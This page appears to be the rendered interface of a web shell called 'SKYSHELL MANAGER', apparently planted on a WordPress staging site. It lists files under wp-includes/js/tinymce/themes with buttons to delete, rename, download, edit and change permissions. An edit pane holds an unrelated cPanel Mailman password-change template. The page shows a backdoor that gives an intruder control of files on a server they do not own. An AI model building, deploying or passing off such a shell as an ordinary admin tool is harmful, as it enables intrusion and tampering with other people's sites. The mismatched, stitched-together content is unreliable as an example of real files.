📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home
/
thevaxnx
/
nativize.com
/
staging
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
wp-links-opml.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: resmailman
<script type="text/javascript"> //<![CDATA[ var REQUIRED_PASSWORD_STRENGTH = %minpwstrength%; var init_page = function() { var password_validators = CPANEL.password.setup("password", "password2", "password_strength", REQUIRED_PASSWORD_STRENGTH, "create_strong_password", "why_strong_passwords_link", "why_strong_passwords_text"); CPANEL.validate.attach_to_form("submit", password_validators); YAHOO.util.Dom.get("password").focus(); }; YAHOO.util.Event.onDOMReady(init_page); //]]> </script> <form action="../scripts/doresmailman"> <!-- prevent password autofill --> <input type="text" style="display:none"> <input type="password" autocomplete='off' style="display:none"> <table> <tr> <td align="right">Mailman Account Lists:</td> <td> <select name="user"> !@users@! <option value="%user%">%user%</option> !@users@! </select> </td> <td></td> </tr> <tr> <td align="right">Password:</td> <td><input type="password" autocomplete='off' name="password" id="password" style="width: 150px" /></td> <td><div id="password_error"></div></td> </tr> <tr> <td align="right">Password Again:</td> <td><input type="password" autocomplete='off' name="password2" id="password2" style="width: 150px" /></td> <td><div id="password2_error"></div></td> </tr> <tr> <td align="right"> Strength (<div style="display: inline" id="why_strong_passwords_link" class="action_link">why?</div>): <div id="why_strong_passwords_text" style="display: none">%password_why%<br /><br />%password_tip%</div> </td> <td><div id="password_strength" style="width: 150px; height: 20px; border: 1px solid black; margin: 5px 0px 3px 0px"></div></td> <td><input type="button" id="create_strong_password" class="btn-secondary" value="Password Generator" /></td> </tr> <tr><td colspan="3"><br /></td></tr> <tr> <td></td> <td><input type="submit" id="submit" value="Change Password" name="submit" class="btn-primary" /></td> <td></td> </tr> </table> </form> </body>
Save